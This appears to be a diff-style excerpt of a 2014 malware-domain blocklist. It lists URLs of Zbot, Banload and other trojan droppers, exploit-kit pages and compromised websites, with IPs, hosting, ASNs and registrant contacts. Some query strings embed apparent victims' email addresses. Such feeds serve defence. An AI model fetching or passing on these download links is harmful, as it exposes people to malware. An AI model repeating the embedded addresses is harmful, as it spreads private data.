+"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/re_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/pe_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_04.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/pe_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_03.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/serasa/serasa_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/serasa/serasa_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/28_09:24","-","94.249.192.105/index.html","-","leads to ransom trojan message page","-","12586","0","DE", +"2014/07/24_12:58","dentairemalin.com/images/report934875438jdfg8i45jg_07242014.exe","217.16.10.2","clweb01.hosteur.com.","Trojan.Banker","-","48809","0","FR", +"2014/07/24_12:53","mathenea.com/css/report934875438jdfg8i45jg_07242014.exe","91.199.120.78","mazer.h3m.com.","Trojan.Banker","Registrant ghm007@hotmail.com","15699","0","ES", +"2014/07/24_09:31","-","117.21.191.47/ng15.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/bet15.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/ng.exe","-","W32/Slenfbot.B.gen!Eldorado","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/beta.exe","-","Trojan.Ageny.ED","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/betr7.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/ng2.exe","-","Win32/Injector.BHYG trojan","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/ng1.exe","-","W32/Slenfbot.B.gen!Eldorado","-","4134","0","CN", +"2014/07/24_09:31","-","31.6.71.85/bet/ngr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/24_09:31","-","117.21.191.47/andr7.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","31.6.71.85/bet/andr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/24_09:31","-","31.6.71.85/bet/betr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/24_09:31","-","31.6.71.85/bet/zpmr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/23_09:27","adobeflashupdate14.com/version/install_flashplayer14.0.0.145_ie.exe","37.187.149.210","o1.i-whost.com.","fake Flash player","Registrant Email:salaiahai123@yahoo.com","16276","0","FR", +"2014/07/15_08:58","jue0jc.lukodorsai.info/dpta5n0tp2","192.200.105.135","192-200-105-135.static.gorillaservers.com.","exploit kit","shelly burch / qahumvfdfku@hotmail.com","53850","0","US", +"2014/07/15_07:26","www.m-barati.de/contao/count.php?id=4213245","94.101.38.14","three.rr1.revido.de.","leads to exploit kit","hostmaster@revido.de","16097","0","DE", +"2014/07/15_07:26","ylpzt.juzojossai.net/9aywse7eva","192.200.105.135","192-200-105-135.static.gorillaservers.com.","exploit kit","Registrar Abuse Contact abuse@web.com","53850","0","US", +"2014/07/11_08:26","directxex.com/uploads/1738599339.ms1.exe?dl=11738599339.ms1.exe","5.135.127.68","-","Trojan.Backdoor.Androm.Ar","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/07/11_08:26","directxex.com/uploads/2126787896.lol.exe","5.135.127.68","-","RAR/Agent.AF","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/07/11_03:50","6b8a953b2bf7788063d5-6e453f33ecbb90f11a62a5c376375af3.r71.cf5.rackcdn.com/Videos%20Player.mp4.exe","64.210.100.99","-","Trojan.FakeAdobe","Registrar Abuse Contact abuse@ascio.com","3549","0","US", +"2014/06/26_14:27","www.cellularbeton.it/js/jquery.js","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2006/3tappa.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.archigate.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.galileounaluna.com/","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.vivaimontina.com/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.elisaart.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.poesiadelsud.it/rende_16_05_07_saggese.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2013/calendario.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.poesiadelsud.it/mostra_internazionale_artecont_1.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.poesiadelsud.it/rende_16_05_07_napolillo.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.anticarredodolomiti.com/index.html","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.gliamicidellunicef.it/skiantos_in_concerto.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2011","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2011/7tappa.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_0068.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_0138.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9540.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_0119.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9597.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9551.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9378.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9445.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.milardi.it/corteconti.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.milardi.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2011/","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.bcservice.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.unicaitaly.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.montacarichi.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.assculturaleincontri.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.ristoromontebasso.it/scripts/menu.js","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.3difx.com","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.3difx.com/serv010.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.chiaperottipaolo.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.marinoderosas.com/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.riccardochinnici.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.eivamos.com/rimessaggio/carrelliconver.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.catgallery.com/email.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.vinyljazzrecords.com/japan.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.racingandclassic.com/pagineit/race.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.sbo.it/babylon.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit, Embedded links leading to illegal pharma","-","8612","0","IT", +"2014/06/26_14:27","nmsbaseball.com/post.php?id=144840","96.0.115.64","rev.opentransfer.com.64.115.0.96.in-addr.arpa.","Exploit","Registrar Abuse Contact domainabuse@tucows.com","32392","0","US", +"2014/06/26_14:27","www.aerreravasi.com/filmestensibile/filmestensibile.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/differenziata/differenziata.html","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/chisiamo/chisiamo.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/comeraggiungerci/comeraggiungerci.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/bolle/bolle.html","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/22_16:25","-","198.15.67.177/D63A5E3246A.jpg","-","Trojan.Zbot","-","20454","0","US", +"2014/06/22_16:25","-","95.154.228.163/1/bot.exe","-","Trojan.Zbot","-","20860","0","GB", +"2014/05/27_04:02","www.sankyo.gr.jp/Pagamento.zip?mscfopoysckwdh","202.224.60.77","www.sankyo.gr.jp.","Trojan.Zbot","-","4685","0","JP", +"2014/05/27_04:02","www.sankyo.gr.jp/Pagamento.zip","202.224.60.77","www.sankyo.gr.jp.","Trojan.Extension.Exploit","-","4685","0","JP", +"2014/05/27_04:02","www.sankyo.gr.jp/Pagamento.zip?IIFEhTaalZlzYipWok","202.224.60.77","www.sankyo.gr.jp.","Trojan.Zbot","-","4685","0","JP", +"2014/05/27_04:02","www.rokus-tgy.hu/Pagamento.zip?IdjJzMrNmz","195.70.32.145","virtweb2.interware.hu.","Trojan.Zbot","-","5588","0","HU", +"2014/05/27_04:02","www.rokus-tgy.hu/Pagamento.zip","195.70.32.145","virtweb2.interware.hu.","Trojan.Extension.Exploit","-","5588","0","HU", +"2014/05/27_04:02","www.flowtec.com.br/vcard/Informazioni.zip","200.195.192.45","jurere.onda.com.br.","Trojan.Zbot","Onda Provedor de Serviços S/A / dominios@ondacorp.com.br","12140","0","BR", +"2014/05/27_04:02","www.flowtec.com.br/vcard/Informazioni.zip","200.195.192.45","jurere.onda.com.br.","Trojan.Extension.Exploit","Onda Provedor de Serviços S/A / dominios@ondacorp.com.br","12140","0","BR", +"2014/05/27_04:02","www.fabioalbini.com/Pay.zip","195.110.150.4","net150-004.mclink.it.","Trojan.Extension.Exploit","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Order.zip","195.110.150.4","net150-004.mclink.it.","Trojan.Extension.Exploit","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Pay.zip?2bMxG=heidi.kostic@aon.at","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Pay.zip?2bMxG=heidi.kostic","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Order.zip?YIjoBgGhCBbs","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Order.zip?snaVs8Hxk1UBauZlc5pQcGW7","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.emrlogistics.com/fr/to2.exe","103.14.120.121","103.14.120.121-static-reverse.gooddomainregistry.com.","Trojan.Inject","Registrar Abuse Contact abuse@gooddomainregistry.com","132322","0","IN", +"2014/05/27_04:02","www.cortesidesign.com/Avviso.zip","213.205.40.169","web-vip-it.eu.tiscali.it.","Trojan.Zbot","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/05/27_04:02","www.cortesidesign.com/Avviso.zip","213.205.40.169","web-vip-it.eu.tiscali.it.","Trojan.Inject","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/05/27_04:02","www.caue971.org/fckeditor/file/wwwntn24comnews/ntn24newsaccidenteautomovilisticoradamelfalcaomonaco2amtodaym.zip","213.186.33.19","cluster010.ovh.net.","Trojan.Agent.AI","Jack SAINSILY / sainsily.j@wanadoo.fr","16276","0","FR", +"2014/05/27_04:02","www.caue971.org/fckeditor/file/wwwntn24comnews/ntn24newsaccidenteautomovilisticoradamelfalcaomonaco2amtodaym.zip","213.186.33.19","cluster010.ovh.net.","Trojan.Zbot","Jack SAINSILY / sainsily.j@wanadoo.fr","16276","0","FR", +"2014/05/27_04:02","www.atousoft.com/img/2.exe","88.190.253.247","pf7-web.online.net.","Spyware.Zbot.VXGen","Registrar Abuse Contact abuse_2014+atousoft.com@bookmyname.com","12322","0","FR", +"2014/05/27_04:02","www.arkinsoftware.in/images/aveksynkens.exe","216.151.164.53","shared-hosting.njtech.com.","Spyware.Zbot.ED","jn prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/27_04:02","writingassociates.com/img/lks.exe","205.186.183.232","ekiaioocio.gs07.gridserver.com.","Trojan.Agent.ED","Registrar Abuse Contact domainabuse@tucows.com","31815","0","US", +"2014/05/27_04:02","vmay.com/wordpress/wp-content/themes/twentytwelve/foot/185.exe","175.182.230.91","175-182-230-91.adsl.dynamic.seed.net.tw.","Spyware.Password","Registrar Abuse Contact abuse@enom.com","4780","0","TW", +"2014/05/27_04:02","troytempest.com/DHLDocument.zip","217.160.115.88","kundenserver.de.","Trojan.Email.Gen","Registrar Abuse Contact abuse@enom.com","8560","0","DE", +"2014/05/27_04:02","villalecchi.com/images/min/b41.exe","209.51.141.123","www.villalecchi.com.","Trojan.Inject","Registrar Abuse Contact onlinenic-enduser@onlinenic.com","3595","0","US", +"2014/05/27_04:02","troytempest.com/DHLDocument.zip","217.160.115.88","kundenserver.de.","Trojan.Zbot","Registrar Abuse Contact abuse@enom.com","8560","0","DE", +"2014/05/27_04:02","smartify.org/Debito.zip?pXDqOuKMAYTwa","199.204.248.108","cpanel08.myhostcenter.com.","Trojan.Zbot","Dheeraj Dasari / ddasari@hotmail.com","17054","0","US", +"2014/05/27_04:02","smartify.org/Informazioni.zip?CAZdpDwfNtUZHf","199.204.248.108","cpanel08.myhostcenter.com.","Trojan.Zbot","Dheeraj Dasari / ddasari@hotmail.com","17054","0","US", +"2014/05/27_04:02","sayherbal.com/snlatxow","108.163.178.131","-","Spyware.ZeuS.GO","-","32613","0","CA", +"2014/05/27_04:02","sasson-cpa.co.il/Progetto.zip?iWPpEOb","194.90.8.20","as.netvision.net.il.","Trojan.Zbot","-","1680","0","IL", +"2014/05/27_04:02","sasson-cpa.co.il/Progetto.zip","194.90.8.20","as.netvision.net.il.","Trojan.Extension.Exploit","-","1680","0","IL", +"2014/05/27_04:02","rainbowcolours.me.uk/z14.exe","46.30.212.183","-","Trojan.Zbot","Nominet UK / -","51468","0","DK", +"2014/05/27_04:02","rainbowcolours.me.uk/hp.exe","46.30.212.183","-","Spyware.Zbot","Nominet UK / -","51468","0","DK", +"2014/05/27_04:02","rainbowcolours.me.uk/g17.exe","46.30.212.183","-","Trojan.Zbot.RPE","Nominet UK / -","51468","0","DK", +"2014/05/27_04:02","optiker-michelmann.de/eoewdksna","81.169.145.155","w9b.rzone.de.","Spyware.ZeuS.GO","hostmaster@strato.de","6724","0","DE", +"2014/05/27_04:02","progettocrea.org/wp-content/themes/telekom/telekom_deutschland_gmbh","109.168.109.228","board02.windows.kolst.it.","Trojan.Email.FakeDoc","Contact Privacy Inc. Customer 0136432151 / progettocrea.org@contactprivacy.com","5602","0","IT", +"2014/05/27_04:02","ns1.the-sinner.net/modules/webstat/vodafone_service_d2","89.169.174.218","-","Trojan.Email.FakeDoc","Registrar Abuse Contact tld-abuse@nic.ru","31514","0","RU", +"2014/05/27_04:02","nkgamers.com/swazi/banalities.exe","173.254.28.89","just89.justhost.com.","Spyware.ZeuS.GO","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2014/05/27_04:02","neumashop.cl/bmfbnoou","190.98.227.154","gtd154.dch.cl.","Spyware.ZeuS.GO","-","14259","0","CL", +"2014/05/27_04:02","nctbonline.co.uk/InvoiceCopy.scr","37.9.169.15","lb-proxy-13.websupport.sk.","Trojan.Zbot","Websupport, s.r.o. / -","51013","0","SK", +"2014/05/27_04:02","ms11.net/%7Ecarmine/DHL%20Document.zip","108.168.210.189","ms11.net.","Trojan.Zbot","Registrar Abuse Contact onlinenic-enduser@onlinenic.com","36351","0","US", +"2014/05/27_04:02","mediatrade.h19.ru/Our","89.108.91.183","double6.holm.ru.","Produce Items.scr Trojan.Email.FakeDoc","-","43146","0","RU", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/risposta_info_1103.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/mail_info_11032014.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/Conferma.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/Mail_Info_11032014.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/conferma.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Risposta.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Mail_Info_11032014.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/Risposta_Info_1103.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?david.cozens+at+martindale.com_rdynpk7uwzi","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?david.cozens%20at%20martindale.com_rdynpk7uwzi","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?david.cozens","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?abstracts%20at%20ages.com.au_yzoxmlfe0f","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/mail_info_11032014.zip?selene-68b%20at%20libero.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/Conferma.zip?aannuzzo574@libero.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?lerchc@kliniken-koeln.de_yex86uhg","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?itas00@virgilio.it_skwsq","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?itas00","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Info/Mail_Info_11032014.zip?58311xaNf5r7s","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?2472316zzqa1knqcgu","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Info/Mail_Info_11032014.zip?11870953rILDR","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Info/Mail_Info_11032014.zip?02127pOiaw5LoQ","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/conferma.zip?michele.armaniniatlibero.it_uubafwuh","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Risposta.zip?9949971rMqgj20wKB","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_risposta/mail_info_11032014.zip?90460199329lkggbup0","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Mail_Info_11032014.zip?15844470966vrURcZ","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta_info_1103.zip?dbspa3@actaliscertymail.it_i8dqtqvi","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Doc/Risposta_Info_1103.zip?dbspa3@actaliscertymail.it_I8d","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Doc/Risposta_Info_1103.zip?cinziofarinelli@libero.it_7pzc6tde","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta_info_1103.zip?cinziofarinelli@libero.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip?fernando.zellettaatalice.it_ftowwc","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip?fernando.zelletta@alice.it_ftowwc","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip?fernando.zelletta@alice.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","innatek.com/ListinoPrezzi.zip","63.111.67.9","ns3.actwd.net.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse@web.com","11486","0","US", 